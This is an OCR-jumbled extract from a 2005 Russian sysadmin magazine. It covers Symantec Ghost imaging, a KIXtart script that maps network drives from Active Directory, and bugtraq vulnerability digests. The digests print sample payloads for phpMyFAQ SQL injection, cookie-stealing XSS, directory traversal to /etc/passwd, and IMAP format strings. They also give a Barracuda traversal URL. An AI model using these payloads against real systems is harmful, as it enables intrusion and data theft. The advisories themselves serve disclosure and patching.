тера, рабочая группа и т. д.),
взяв в качестве шаблона ва-
риант от компьютера-клона
(см. рис. 7).
Вот теперь мы можем при-
ступать к клонированию ком-
пьютеров.
Лейся, образ…
Для доставки образа созда-
дим задание Deploy Image.
Перейдем в раздел Tasks,
и в контекстном меню мыши
выберем пункт «New Task».
Н а п е р в о й з а к л а д к е о т-
метим галочками «Clone»
и «Configuration» и выберем
группу подопытных машин
(см. рис. 8).
На второй закладке вы-
берем режим Multicast, на за-
17
 администрирование
кладке «Clone», укажем, что мы После выполнения команды
будем разворачивать наш образ компьютеры перезагрузятся и под-
на второй раздел первого жестко- ключатся к домену.
го диска (см. рис. 9).
Для того чтобы второй раздел Заключение
не занял все оставшееся место на Справедливости ради нужно отме-
жестком диске, нажмем на кнопку тить, что существуют ситуации, в
Advanced и укажем дополнитель- которых не обязательно использо-
ный параметр командной строки: вать все компоненты продукта. Ес-
-szee. Убедимся, что на закладке ли вы занимаетесь предпродаж-
«Configuration» установлен пара- ной установкой ОС, то Ghost-кли-
метр «default», и нажмем «OK». ент и консоль нам вряд ли понадо-
Теперь в контекстном меню бится, а вот sysprep и компакт-диск
только что созданного задания вы- с DOS-версией клиента Ghost будут
берем пункт «Execute Task». Через как нельзя кстати. При помощи про-
несколько минут компьютеры загру- стого скрипта можно заранее запи-
зят DOS-версию клиента Ghost и на- сать ОС на десяток жестких дисков,
чнут передачу образа. Если процесс а затем просто при необходимости
прошел нормально, то после выпол- вставлять их в собираемые компью-
нения задания на всех компьютерах теры. Похожий метод будет полезен
группы будет установлена «свежая» Рисунок 9. Настройки клонирования задания и при установке нескольких машин
Deploy Image
операционная система. в небольших фирмах. Ghost-кли-
В качестве последнего штриха кладке первого параметра укажем, ент DOS с поддержкой сетевых карт
добавим эти компьютеры в домен. что мы хотим записать файл netdom. позволит быстро переустановить ком-
Для этого можно либо воспользовать- exe в incoming-каталог клиента Ghost, пьютер, не прибегая к помощи отвер-
ся соответствующей функцией Ghost, для второго параметра укажем, что тки. Если же компьютеров у вас очень
либо провести подключение вручную. в ОС мы хотим запустить следующую много и дружбу с Ghost вы планируе-
Мы поступим вторым способом, попут- команду: те всерьез и надолго – устанавливай-
но рассмотрев механизм выполнения те консоль, не пожалеете!
команд на компьютерах с Ghost-кли- "c:\program Þles\symantec\ghost\ ↵
incoming\netdom.exe"
ентом. Для решения этой задачи вос- Литература, ссылки:
пользуемся утилитой netdom.exe, вхо- с параметром: 1. Symantec Ghost Implementation
дящей в состав Windows Support Tools. Guide.
В консоли создадим задание «Add Join %computername% /domain: ↵ 2. h t t p : / / s e a . s y m a n t e c . c o m / j p /
имя _ домена /userD: ↵
to domain», с параметрами «Transfer Administrator@имя _ домена ↵ promotions.cfm?productid=9&promo
Files» и «Execute Command». На за- /password:пароль /reboot code=website.

Symantec Ghost Workstation 5. Одной из возможностей дан- вы случайно совершили ошибку, – не рас-
и VMWare Workstation ной программы является созданием сним- страивайтесь, ведь у вас есть Undo!
Прочитав заголовок, вы наверняка подума- ков (Snapshot) и кло-
ете: «С Symantec Ghost все понятно, но при нов. Если различия
чем тут WMWare Workstation? Ведь это со- между используемы-
вершенно разные продукты». На самом де- ми версиями не очень
ле, WMWare Workstation хорошо дополня- велики, то различные
ет систему с Ghost. Представьте себе, что образы можно под-
вам необходимо поддерживать несколь- держивать в дереве
ко различных клонов: бухгалтерия, отдел снимков (см. рис. 10).
программирования, студия дизайна, отдел При этом для установ-
верстки и т. д. При этом время от времени ки новой программы
приходится обновлять некоторые програм- не нужно загружать
мы. С использованием стандартной схемы образ на тестовый
с Ghost процесс обновления, скорее всего, компьютер, достаточ-
будет проходить так: распаковка образа на но просто перейти к
тестовый компьютер, установка программы, нужному снимку, ус-
создание нового образа. А что если после тановить нужную про-
обновления вы нашли ошибку? Делать ре- грамму и скопиро-
зервные копии образов? При каждом об- вать образ с помощью
новлении? Для каждой ветки образа? А вот Ghost-клиента. Если
теперь самое время вспомнить о VMWare в процессе установки Рисунок 10. Дерево снимков VMWare Workstation

18

Переполнение буфера в DameWare
Mini Remote Control Server
Программа: DameWare Mini Remote Control Server 4.9.0 и
более ранние версии.
Опасность: Критическая.
Описание: Переполнение буфера обнаружено в процеду-
ре аутентификации при обработке слишком длинного име-
ни пользователя (порт 6129). Удаленный пользователь мо-
жет скомпрометировать удаленную систему.
URL производителя: www.dameware.com.
Решение: Установите последнюю версию (4.9.2.4) с сай-
та производителя.
Переполнение буфера
в URL-обработчике в Mozilla Firefox
Программа: Netscape Netscape 8.0.3 .3, Netscape Netscape
7.2, Mozilla Firefox 1.5 Beta1, Mozilla Firefox 1.0.6, Mozilla
Browser 1.7.11.
Опасность: Критическая.
Описание: Переполнение буфера в Mozilla/Netscape/Firefox
позволяет удаленному пользователю вызвать отказ в об-
служивании или выполнить произвольный код на системе
пользователя, просматривающего специально обработан-
ную веб-страницу. Пример:
<A HREF=https:--------------------------------------------- >
URL производителя: http://www.mozilla.org.
Решение: Установите патч с сайта производителя – Mozilla
Patch 307259.xpi.
Уязвимость форматной строки
в GNU Mailutils imap4d
Программа: GNU Mailutils 0.6.
Опасность: Высокая.
Описание: Уязвимость форматной строки существует при
обработке команд IMAP SEARCH в файле search.c. Удален-
ный авторизованный пользователь может послать специ-
ально сформированную SEARCH-команду и выполнить про-
извольный код на целевой системе. Пример:
SEARCH TOPIC %08x.%08x.%08x.%08x
SEARCH TOPIC %s%s%s
URL производителя: www.gnu.org/software/mailutils/
mailutils.html.
Решение: Установите исправление с сайта производите-
ля.
Переполнение буфера в Cisco IOS
Authentication Proxy for FTP/Telnet
Программа: Cisco IOS 12.х.
Опасность: Критическая.
Описание: Переполнение буфера существует в Authentication
Proxy FTP/Telnet при обработке данных аутентификации.
Удачная эксплуатация уязвимости вызывает перезагруз-
ку устройства и может позволить удаленное выполнение
кода.
URL производителя: www.cisco.com.
Решение: В настоящее время способов устранения уязви-
мости не существует.
№9, сентябрь 2005
bugtraq
Множественные уязвимости в phpMyFAQ
Программа: phpMyFAQ 1.5.1.
Опасность: Высокая.
Описание: 1. SQL-инъекция обнаружена в сценарии /admin/
password.php из-за недостаточной обработки входных дан-
ных. При выключенной опции «PHP magic quotes» удален-
ный пользователь может выполнить произвольные SQL-
команды на системе. Пример формы восстановления па-
роля:
user: ' or isnull(1/0) /*
mail: [your _ email]
2. Удаленный пользователь может произвести XSS-на-
падение и получить доступ к потенциально важным дан-
ным других пользователей. Пример:
http://[target]/[path]/phpmyfaq/admin/footer.php?
PMF _ CONF[version]=<script>alert(document.cookie) ↵
</script>
http://[target]/[path]/phpmyfaq/admin/header.php?
PMF _ LANG[metaLanguage]="><script>alert(document.cookie) ↵
</script>
3. Удаленный пользователь может выполнить произ-
вольный PHP-сценарий на системе с помощью символов
обхода каталога. Пример:
http://[target]/[path]/phpmyfaq/index.php?
LANGCODE=/../../../../[scriptname]
http://[target]/[path]/phpmyfaq/index.php?
LANGCODE=/../../ ../../../../etc/passwd%00
4. Удаленный пользователь может получить доступ
к лог-файлу. Пример:
http://[target]/[path]/phpmyfaq/data/tracking[date]
5. Удаленный пользователь может получить данные об
установочной директории приложения на сервере. При-
мер:
http://[target]/[path]/phpmyfaq/index.php?LANGCODE= ↵
[a _ non _ existent _ Þle]
URL производителя: www.phpmyfaq.de.
Решение: Установите последнюю версию (1.5.2) с сайта
производителя.
Переполнение буфера
в VERITAS Storage Exec
Программа: VERITAS StorageCentral 5.2; VERITAS Storage
Exec 5.3.
Опасность: Критическая.
Описание: Уязвимость существует в нескольких DCOM-
компонентах при обработке входных данных. Удаленный
пользователь может создать специально сформирован-
ный HTML-код, который вызовет соответствующий ActiveX-
объект со специально сформированными значениями и вы-
зовет переполнение буфера. Удачная эксплуатация уяз-
вимости позволит злоумышленнику вызвать отказ в об-
служивании или выполнить произвольный код на целе-
вой системе.
URL производителя: www.veritas.com.
Решение: Установите исправление с сайта производите-
ля.
Составил Александр Антипов
19
 администрирование

ПОДКЛЮЧАЕМ СЕТЕВЫЕ РЕСУРСЫ

В АВТОМАТИЧЕСКОМ РЕЖИМЕ

ИВАН КОРОБКО
В настоящее время сети получили огромное распространение: теперь они не только на работе,
но и дома. Статья посвящена созданию скрипта, с помощью которого осуществляется
интеллектуальное управление сетевыми дисками, смена их описаний в папке «Мой компьютер».

С
егодня почти на любом предприятии есть компьюте-
ры, объединенные в сеть. Каждому сотруднику, име-
ющему на своем рабочем месте компьютер, должен
быть предоставлен доступ к сетевым ресурсам. С ростом
размера предприятия происходит рост сети. У системно-
го администратора и специалистов системной поддержки
возрастают временные затраты на ее администрирова-
ние. В том числе на опубликование новых сетевых ресур-
сов, при переходе пользователя с одного рабочего места
на другое; возникают проблемы с ограничением количес-
тва дисков (их всего может быть 27, включая сетевые, ло-
кальные, съемные диски). Затраты на администрирование
можно сократить, создав сценарий регистрации пользова-
телей в сети или, как говорят, сценарий загрузки, который
на основе членства учетной записи пользователя в соот-
ветствующих группах безопасности будет подключать не-
обходимые сетевые ресурсы в автоматическом режиме.
При этом на одну и ту же букву можно подключить разные
ресурсы для разных пользователей при условии непере-
сечения членства пользователя в соответствующих груп-
пах безопасности. В противном случае, некоторые ресур-
сы будут недоступны пользователям. Приступим к созда-
нию такого сценария.
Выбор языка программирования
Для создания сценариев регистрации пользователей сущес-
твует множество языков, однако остановим свой выбор на
KIXTart. Этот язык является стандартным языком програм-
мирования сценариев компании Microsoft. Его дистрибутив
можно найти в Microsoft Resource Kit или бесплатно загру-

20

Рисунок 1. Пример изменения описания сетевого диска
в папке «Мой Компьютер»
зить последнюю версию из сети Интернет (http://kixtart.org).
В настоящее время используется KIXTart версии 4.50.
Замечание: сценарии, созданные вами ранее на VBScript,
Jscript могут быть легко переписаны под KIXtart. Все приме-
ры в этой статье будут приведены на языке KIXTart.
Источник информации – файл или база
данных?
Чтобы успешно подключить сетевой ресурс, пользователю
необходимо знать имя сетевого диска, с которым будет ас-
социироваться ресурс, и UNC-путь сетевого подключаемого
ресурса. Желательно иметь его описание, чтобы скоррек-
тировать название диска в папке «Мой компьютер». Встает
закономерный вопрос – где же лучше всего хранить эту ин-
формацию? Можно в текстовом файле, лежащем в ката-
логе Netlogon, или в каком-нибудь хранилище, например,
в Active Directory (далее AD). Мною использовались оба ва-
рианта, и в итоге выбор пал на AD. Было достаточно много
причин переместить данные из текстового файла в AD, на-
пример, удобство в обслуживании, уменьшение програм-
много кода и т. д.
Принцип работы сценария
Для хранения информации в AD о подключаемом ресурсе
был использован стандартный объект SharedFolder, кото-
рый включал в себя информацию о букве, на которую под-
ключается сетевой ресурс; UNC-путь к сетевому ресурсу;
описание сетевого ресурса, которое фигурирует в папке
«Мой Компьютер»; имя группы безопасности, членам ко-
торой будет подключен ресурс.
Опишем механизм подключения одного из сетевых ре-
сурсов, на примере общей папки подразделения «Otdel1».
Пусть папка имеет следующий сетевой путь – «\\Esmiralda\
Work$\Otdel1», подключается к диску «К» и имеет описание
«Служебные файлы» (см. рис. 1). В AD в любой OU, напри-
мер «Shares», создайте объект «Share Folder» (см. рис. 2).
В любой другой OU создайте группы безопасности, имена
которых совпадают с URL сетевого ресурса после послед-
ней «точки». В приведенном примере группа, соответству-
ющая подключаемому диску, должна называться «Otdel1».
Членам этой группы будет подключен сетевой ресурс при
условии, что она будет добавлена во вкладку безопаснос-
№9, сентябрь 2005
администрирование
Рисунок 2. Свойства объекта Shared Folder в Active Directory
ти папки «Otdel1» с соответствующими правами на доступ
к этой папке. Если необходимо сделать несколько различ-
ных уровней доступа, в названии группы можно использо-
вать префикс.
Таким образом, каждому подключаемому скриптом се-
тевому ресурсу соответствуют два объекта AD: опублико-
ванная сетевая папка и соответствующая ей группа безо-
пасности.
Замечание: в том случае, если ресурс должен быть до-
ступен всем пользователям сети, то необходимо в соответс-
твующую ресурсу группу добавить группу «domain users»
с соответствующими правами.
Сценарий подключения сетевых дисков
Сценарий можно условно разбить на несколько логичес-
ких частей:
! определения списка групп, в которые входит текущий
пользователь;
! подключение к АD и чтение значений соответствующих
полей;
! отключение всех обрабатываемых скриптом сетевых
дисков;
! подключение необходимых сетевых дисков;
! корректировка описания сетевых дисков в папке «Мой
компьютер».
Определение членства в соответствующих
группах безопасности
Определение членства в соответствующих группах безо-
пасности осуществляется с помощью встроенной функ-
ции EnumGroup():
$i=0
Do
$Group = EnumGroup($i)
$i=$i+1
Until Len($Group) = 0
Список групп, возвращаемый этой функцией (перемен-
ная $Group), имеет следующий шаблон: DOMAIN\GROUP.
Поскольку в AD группы хранятся без префикса (в данном
случае префиксов является короткое имя домена), то полу-
ченный список групп необходимо преобразовать. Результат
рекомендуется записать в ту же переменную, т.е. GROUP:
21
 администрирование
Group=Right($Group, Len($Group)-InstrRev($Group,"\")
Подключение к АD и чтение значений
соответствующих полей
Подключение к АD реализовано с помощью ADODB-со-
единения:
$strADSQuery = "SELECT keywords, name, description, ↵
cn, uncname FROM '" +$domain _ +"' ↵
WHERE objectClass='volume'"
$objConnection = CreateObject("ADODB.Connection")
$objCommand = CreateObject("ADODB.Command")
$objConnection.CommandTimeout = 120
$objConnection.Provider = "ADsDSOObject"
$objConnection.Open ("Active Directory Provider")
$objCommand.ActiveConnection = $objConnection
$objCommand.CommandText = $strADSQuery
$st = $objCommand.Execute
Поиск необходимых объектов осуществляется с по-
мощью SQL-запроса. В качестве фильтра указывается
ObjectClass=’volume’:
"SELECT uname, keywords, description, cn FROM ↵
'" +$domain+"' WHERE objectClass='volume'"
где $domain – имя текущего домена, который определяет-
ся чтением глобального каталога RootDSE. Для его чте-
ния достаточно прав обычного пользователя. Переменная
$domain имеет вид «DC=domain,DC=com»:
$rootDSE _ = GetObject("LDAP://RootDSE")
$domain = "LDAP://" + $rootDSE _ .Get("defaultNamingContext")
Теперь необходимо правильно составить SQL-запрос.
Для этого понадобятся следующие теоретические знания,
а именно: как называются поля данного объекта и какому
полю соответствует тот или иной тип данных (строка или
массив). Рассмотрим подробнее объект «Shared Folder».
Каждое поле любого объекта AD может быть либо строкой,
либо массивом. Соответственно, механизмы чтения полей,
имеющих разный тип данных, также отличаются.
Чтение поля, соответствующего типу данных «строка»,
осуществляется следующим образом:
$Value=$St.Fields("Field _ Name").Value
Если тип данных массив:
$Val _ Array=$St.Fields("Field _ Name").Value
For Each $Val _ Element in $Val _ Array
$Value=$Value+$Val _ Element
Next
В скрипте используются поля, описания и тип данных,
которые приведены в таблице 1 (см. рис. 2).
Чтение полей всех опубликованных сетевых ресурсов
осуществляется с помощью цикла Do…Until:
$st.MoveÞrst
Do
… обходимо. Дело в том, что сетевой ресурс может быть двух
$st.MoveNext
Until $st.EOF
22
Таблица 1. Описание используемых полей объекта Shared Folder
Как видно из приведенного примера, навигация по объ-
ектам, отобранным в результате SQL-запроса, осуществля-
ется с помощью функций MoveFirst и MoveNext. Признаком
конца списка является EOF.
Итак, чтение полей осуществляется следующим обра-
зом:
$st.MoveÞrst
Do
$cn=$St.Fields("cn").Value
$uncname=$St.Fields("uncname").Value
$ds _ s=""
$dss=$St.Fields("description").Value
for each $ds in $dss
$ds _ s=$ds _ s + $ds
Next
$keyw _ s=""
$kss=$St.Fields("keywords").Value
for each $ks in $kss
$keyw _ s=$keyw _ s+cstr($ks)
Next
…
$st.MoveNext
Until $st.EOF
Отключение сетевых дисков
Отключение всех обрабатываемых скриптом сетевых дис-
ков осуществляется с помощью команды USE:
$st.MoveÞrst
Do
$ds _ s=""
$dss=$St.Fields("description").Value
for each $ds in $dss
$ds _ s=$ds _ s + $ds
Next
use $ds _ s+":" /delete /persistent
$St.MoveNext
Until $St.EOF
где переменная $ds_s содержит значение поля, description –
буква на которую монтируется диск. Благодаря такому меха-
низму, скрипт управляет только теми сетевыми дисками, ко-
торые используются системным администратором в AD.
Подключение необходимых сетевых дисков
Подключение дисков осуществляется по алгоритму:
Сначала определяется необходимая для подключения
сетевого диска информация, а именно буква, на которую
монтируется диск (поле description); UNC-путь ресурса (по-
ле UNCName); группа, членам которой будет подключен ре-
сурс (поле cn).
У читателя скорее всего возникнет закономерный воп-
рос: зачем использовать поле cn, когда имя группы фигу-
рирует в UNC-путь ресурса? Чтение поля CN жизненно не-
видов: общий и индивидуальный. Приведем два приме-
ра. В первом случае осуществляется подключение общей

папки обмена данными, назовем ее «Exchange». Исходя
из этого папка, к которой предоставлен доступ, называет-
ся «Exchange», соответствующая ей группа безопасности –
«Exchange» и поскольку в эту группу входят все пользовате-
ли, то членом этой группы является группа «Domain Users».
Во втором случае, нам необходимо подключить каждому
пользователю домашний каталог. Для этого необходимо со-
здать папку, например, «HomeDirs» и создать в ней подката-
логи, соответствующие логинам пользователей. Ситуация
изменилась – сетевой путь к папке использовать нельзя,
однако есть поле CN – имя ресурса, где можно записать
всю необходимую информацию: имя пользователя и соот-
ветствующую группу безопасности (см. рис. 2).
Итак, после определения трех необходимых полей уз-
нать, входит ли пользователь в соответствующую ресурсу
группу безопасности и при положительном исходе провер-
ки приступить к подключению ресурса по одному из двух
алгоритмов. Выбор алгоритма зависит от наличия логина
в считанном значении CN.
Подключение диска осуществляется с помощью ко-
манды use:
; элементами массива $usergroup _ name[] являются группы,
; членами которых является текущий пользователь
for $t=0 to ubound($usergroup _ name)
if instr($usergroup _ name[$t],$group _ b)<>0
; критерием персонализации является членство
; в перечисленных группах PersonalGroup1…3
if instr(ucase($group _ b),ucase("PersonalGroup1"))<>0 ↵
or instr(ucase($group _ b),ucase("PersonalGroup2"))<>0 ↵
or instr(ucase($group _ b),ucase("PersonalGroup3"))<>0
if instr($cn,@userid)<>0
use $ds _ s+":" $uncname
? " !!!!" + $ds _ s+":" $uncname
if @error=5 ; ошибка доступа
; к ресурсу
$error _ code="1"
$error _ message=$error _ message+ ↵
"Не удалось подключить диск " ↵
+$ds _ s+" к ресурсу "+ ↵
$cn+chr(13)
EndIf
endif
else
use $ds _ s+":" $uncname
? " !!!!" + $ds _ s+":" $uncname
if @error=5 ; ошибка доступа
; к ресурсу
$error _ code="1"
$error _ message=$error _ message+ ↵
"Не удалось подключить диск " ↵
+$ds _ s+" к ресурсу "+ ↵
$cn+chr(13)
EndIf
endif
endif
next
Корректировка описаний дисков
в папке «Мой компьютер»
Механизм переименования сетевых дисков в папке «Мой
компьютер» лучше всего запускать после завершения про-
цесса подключения самих сетевых дисков. У читателя мо-
жет возникнуть закономерный вопрос: «Зачем это вооб-
ще надо?». Существует несколько причин. Приведем не-
которые из них: представьте, что у вас длинный сетевой
№9, сентябрь 2005
администрирование
путь – буквы диска не видно. Согласитесь, что это неудоб-
но. Во вторых, в некоторых ситуациях пользователь не дол-
жен знать, где находится ресурс. В третьих, пусть пользо-
ватель читает не UNC-пути к дискам, а нормальные их на-
звания: «Файлы моего подразделения» или «Мои проекты».
Ему сразу становится ясно, для чего предназначен диск. По-
верьте, не все пользователи соответствуют термину «опыт-
ный пользователь». Это связано с тем, что на подключение
диска требуется время, которое зависит от местоположения
рабочей станции, загруженности сервера и других факто-
ров. Точно его рассчитать не представляется возможным,
поэтому для ускорения работы скрипта лучше разделить
блоки подключения дисков и смены описания с помощью
функции-задержки. Действие функции основано на вы-
числении промежутка времени с помощью нового макро-
са @Ticks, который возвращает количество миллисекунд с
момента загрузки компьютера, определяется разность вре-
мени – при достижении указанного интервала во времени,
задержки, осуществляется выход из цикла:
$delay _ size=3
$Q = @Ticks + $delay _ size*1000 ; x – количество секунд
; задержки
Do
Until @Ticks >= $Q
Механизм смены описания в Windows 2000 и Windows XP
разный. Характеристики всех типов дисков (сетевых, ло-
кальных и съемных) в Windows 2000 хранятся в ветви ре-
естра HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\MountPoints в Windows 2000, для
Windows XP – в HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Explorer\MountPoints2.
Рассмотрим каждый механизм подключения сетевых
дисков отдельно. Начнем с Windows XP, т.к. там он наибо-
лее понятен и прост.
Переименование описаний сетевых дисков
для Windows XP
Точки монтирования сетевых дисков организованы по
следующему принципу: в подпапке HKEY_CURRENT_
USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
MountPoints2 для сетевых дисков создаются подразделы,
имена которых организованы по принципу: «## имя серве-
ра # имя папки, к которой предоставлен доступ # подпапка1
#.... # подпапкаX». В каждой из этих подпапок присутствуют
3 обязательных параметра, четвертый – _LabelFromReg так-
же должен быть создан (см. рис. 3). Для смены имени сете-
Рисунок 3. Фрагмент реестра, в котором описываются точки
монтирования сетевых дисков (Windows XP)
23
 администрирование
вого диска в папке «Мой Компьютер» необходимо изменить
значение строковой переменной _LabelFromReg.
WriteValue(cstr($keyw _ path+"\"+$temp1), ↵
" _ LabelFromReg",cstr($keyw _ s),"REG _ SZ")
Для определения переменной $key_path необходимо
вычислить названия папок, UNC-путь: необходимо заме-
нить символ «\» на «#»:
$st.MoveÞrst
Do
$uncname=$St.Fields(«uncname»).Value
… Таблица, представленная на рис. 5, показывает набор знаков
$keyw _ path="HKEY _ CURRENT _ USER\Software\Microsoft\ ↵
Windows\CurrentVersion\Explorer\MountPoints2"
$uncname=Right($uncname,Len($uncname)-2)
$keyw _ array=split($uncname,»\»)
$temp1="#"
For Each $ugu in $keyw _ array
$temp1=$temp1+"#"+$ugu
Next
WriteValue(cstr($keyw _ path+"\"+$temp1), ↵
" _ LabelFromReg",cstr($keyw _ s),"REG _ SZ")
$st.MoveNext
Until $st.EOF
Переименование описаний сетевых дисков
для Windows 2000
Логика подключения сетевых дисков Windows 2000 и XP
сильно отличаются. В ветви реестра «HKEY_CURRENT_
USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
MountPoints» созданы подразделы (см. рис. 4), имена ко-
торых совпадают с буквой подключаемого сетевого дис-
ка. Внутри каждого из них существуют еще подразде-
лы. Среди них обязательными являются Autorun, _DIL,
_LabelFromDesktopINI. Для изменения описания диска
в папке «Мой Компьютер» в каждой из них необходимо
создать два раздела, если они еще не существуют: _GVI
и _LabelFromReg. В каждом из них при внесении изменений
необходимо менять значение параметра Version, имеющего
тип данных REG_DWORD. В подпапке _LabelFromReg допол-
нительно необходимо создать ключ Cache, в котором в за-
шифрованном виде находится описание подключаемого се-
тевого диска. Тип данных параметра Cache – REG_BINARY.
Опишем систему шифрования данного параметра на при-
мере фразы «Служебные файлы», причем последняя бук-
ва «е» в первом слове пусть будет английская. Нам нужен
пример любой английской буквы. Надо рассмотреть алго-
ритм обработки латинских и русских символов.
Рисунок 4. Фрагмент реестра, в котором описываются точки
монтирования сетевых дисков (Windows 2000)
24
Кодовая таблица Windows (CP-1251)
Таблицы кодов знаков ASCII содержат десятичные и шестнадца-
теричные значения расширенного набора знаков ASCII (American
Standards Committee for Information Interchange – американский ко-
митет стандартов по обмену информацией). Расширенный набор
знаков включает набор знаков ASCII и 128 дополнительных зна-
ков для рисования графики и линий, которые часто упоминаются
как «набор знаков IBM».
Отображаемые в Windows знаки с кодами больше 127 зави-
сят от выбранной гарнитуры шрифта.
по умолчанию для текстового приложения.
Рассмотрим преобразование первой буквы выражения –
русской заглавной буквы «С». Процедура чтения кода сим-
вола осуществляется с помощью функции ASC. Букве «С»
соответствует номер 209 в таблице ASCII (см. рис. 5). За-
тем необходимо перевести полученное значение в шест-
надцатеричное с помощью DecToHex, параметром кото-
рой является число – ASCII-код символа. Символу с ASCII
с номером 209 соответствует шестнадцатеричное число
D1. Теперь самое интересное: полученное значение раз-
бивают на два символа.
Буквенное значение первого символа преобразуют в
цифру в соответствии с таблицей 2, а для идентификации
языка добавляют 2-й байт. Первым байтом является два
символа – НЕХ-код буквы.
Таблица 2. Преобразование первого символа HEX-кода буквы
Таким образом, получаем, что первому символу соот-
ветствует код «21» – это первый байт. Второй байт при-
нимает значение в зависимости от языка: 04 – русский
язык и 00 – английский. Он определяется по коду симво-
ла: если ASCII-код символа больше 128, то буква русская
(см. рис. 5), в противном случае – английская. Итак, вто-
рой байт символа равен «04», а сам символ – «21 04». Для
наглядности привожу таблицу преобразования всего выра-
жения (см. таблицу 3).
Рисунок 5. Кодовая таблица Windows (CP-1251)
 администрирование
Таблица 3. Карта преобразования фразы «Служебные файлы» If $ßag _ S=0

Select
Case instr(ucase($string),UCase("с"))<>0
$t=$t+cstr("1")+$string2
$ßag _ S=1
…
EndSelect

If $ßag _ S=0
$t=$t+cstr(dectohex(Asc(Right(Left ↵
($keyw _ s,$c),1))))
endif

Определение 2-го байта символа осуществляется по

ASCII-коду символа:

If Asc(Right(Left($keyw _ s,$c),1))>128
$t=$t+"04"
Else
$t=$t+"00"
Endif
Настало время осветить этот вопрос с точки зрения
программирования. Итак, мы рассмотрели преобразова- Поскольку строка описания может иметь только 32 сим-
ние только одного символа, однако выражение состоит из вола и обновляется исключительно записываемая часть,
множества символов, которые необходимо последователь- то во избежание оставления «хвостов» необходимо все ос-
но преобразовать: тальные символы обнулить:

$keyw _ s="Служебные файлы" For $r=1 to 32-len($keyw _ s)

For $c=1 to Len($keyw _ s) $t=$t+cstr("00")
$symbol= cstr(dectohex(Asc(Right(Left($keyw _ s,$c),1))) Next
Next
И, наконец, последний штрих – запись соответствую-
В приведенном примере переход от символа к символу щих значений в реестр:
осуществляется с помощью цикла For…Next и комбинации
функций Left и Right. В конечном счете переменная $symbol WriteValue($keyw _ path+"\"+$ds _ s+"\ _ LabelFromReg", ↵
"Cache", $t, "REG _ BINARY")
является шестнадцатеричным числом (HEX). $r _ w1=ReadValue($keyw _ path+"\"+$ds _ s+ ↵
Теперь необходимо отдельно получить первый и вто- "\ _ LabelFromReg","version")
WriteValue($keyw _ path+"\"+$ds _ s+"\ _ LabelFromReg", ↵
рой символы каждого из HEX-числа и с первым символом "Version", $r _ w1+1, "REG _ DWORD")
в случае, если его код ASCII больше 128, выполнить преоб- $r _ w2=ReadValue($keyw _ path+"\"+$ds _ s+ ↵
"\ _ GVI","version")
разование (см. таблицу 3). Первый символ и второй сим- WriteValue($keyw _ path+"\"+$ds _ s+"\ _ GVI", "Version", ↵
вол определяются следующим образом: $r _ w2+1, "REG _ DWORD")

$string=ucase(left(cstr(dectohex(Asc(Right ↵ В приведенном примере осуществляется наращивание

(Left($keyw _ s,$c),1)))),1))
$string2=ucase(right(cstr(dectohex(Asc(Right ↵
(Left($keyw _ s,$c),1)))),1))
Приступим к реализации алгоритма преобразования
первого символа шестнадцатеричного числа. В нем це-
лесообразно использовать систему флагов и инструкцию
select…case.
Приведем пример преобразования первой буквы вы-
ражения – «С». Как было определено ранее, этому сим-
волу соответствует шестнадцатеричное значение D1, ис-
ходя из таблицы 2, D должно преобразоваться в 2, а са-
мо число в 21:
версии в разделах _LabelFromReg и _GVI.
Теперь осталось научить скрипт определять на какой
операционной системе он выполняется и с описанием под-
ключения сетевых дисков будет покончено.
Тип определенной системы в KIXTart определяется с по-
мощью макроса @PRODUCTTYPE.
Таким образом, если в возвращаемом макросом зна-
чении присутствует комбинация символов 2000, то выпол-
Таблица 4. Список возвращаемых значений макросом @ProductType

Select
…
Case instr(ucase($string),UCase("d"))<>0
$t=$t+cstr("2")+$string2
…
End Select

В данном случае используется только инструкция

select…case. Флаговая система используется для опреде-
ления алгоритма преобразования, в зависимости от HEX-
кода символа:

№9, сентябрь 2005 25

 администрирование
Рисунок 6. Диалоговое окно свойства пользователей в AD
няется сценарий для Windows 2000, и для Windows XP, со-
ответственно, XP:
If instr(ucase(@producttype), ucase("2000"))<>0
………; сценарий для Windows 2000
Else If instr(ucase(@producttype), ucase("xp"))<>0
………; сценарий для Windows XP
EndIf EndIf
Полную версию сценария смотрите на сайте www.samag.ru
в разделе «Исходный код».
Внедрение скрипта в эксплуатацию
Скрипт выполняется каждый раз при регистрации поль-
зователя в сети, если он указан в разделе Profile свойств
пользователя (см. рис. 6) службы Active Directory: Users
and Computers.
В папке Netlogon должны находиться файлы:
! KIX32.EXE
! SCRIPT.KIX
! START.BAT
Файл Start.bat имеет следующий листинг:
start /wait kix32.exe script.kix
На время выполнения скрипта необходимо скрыть CMD-
панель, в которой выполняется скрипт и приостановить за-
грузку рабочего стола до окончания всего скрипта. Этого
результата добиваются с помощью групповой политики,
распространяющейся на домен («Default Domain Controllers
Policy»). В разделе групповой политики «User Configuration»
необходимо, соответственно, включить «Run legacy logon
script synhronously» (запускать сценарий загрузки синхрон-
но) и «Run legasy script hidden» (запускать сценарий скры-
то). Для этого необходимо проделать следующее:
26
Рисунок 7. Свойства домена в AD
Рисунок 8. Доменная политика безопасности
! Зарегистрироваться на сервере с помощью учетной за-
писи, имеющей административные права.
! Загрузить в Active Directory Users and Computers («Start →
Programs → Administrative Tools») и войти в свойства кон-
троллера домена.
! Перейти во вкладку «Group Policy» и загрузить «Default
Dоmain Policy» (см. рис. 7).
! В загруженной групповой политике (Default Domain
Policy) необходимо в «User Configuration» (настройках
пользователя) войти в «Administrative Templates» (адми-
нистартивные настройки). Там выбрать раздел «System»
(система), вкладку «logon/logoff» (войти/выйти) и вклю-
чить раннее оговоренные политики (см. рис. 8).
Заключение
Таким образом созданный сценарий автоматически подклю-
чает и отключает сетевые ресурсы. Управляет только теми
буквами дисков, которые присутствуют в поле description
опубликованных сетевых ресурсов. С помощью скрипта мож-
но реализовать множественное подключение сетевых ресур-
сов на одну букву при условии, что членство пользователей
в соответствующих группах не пересекается.

Обход каталога и выполнение команд
в Barracuda Spam Firewall
Программа: Barracuda Spam Firewall версии до 3.1.18.
Опасность: Высокая.
Описание: Обход каталога возможен из-за недостаточной
обработки входных данных в параметре f сценария /cgi-bin/
img.pl. Удаленный пользователь может с помощью специ-
ально сформированного URL, содержащего символы обхо-
да каталога, просмотреть произвольные файлы и выпол-
нить произвольные команды на системе. Примеры:
http://[target]:8000/cgi-bin/img.pl?f=../home/
emailswitch/code/ conÞg/current.conf
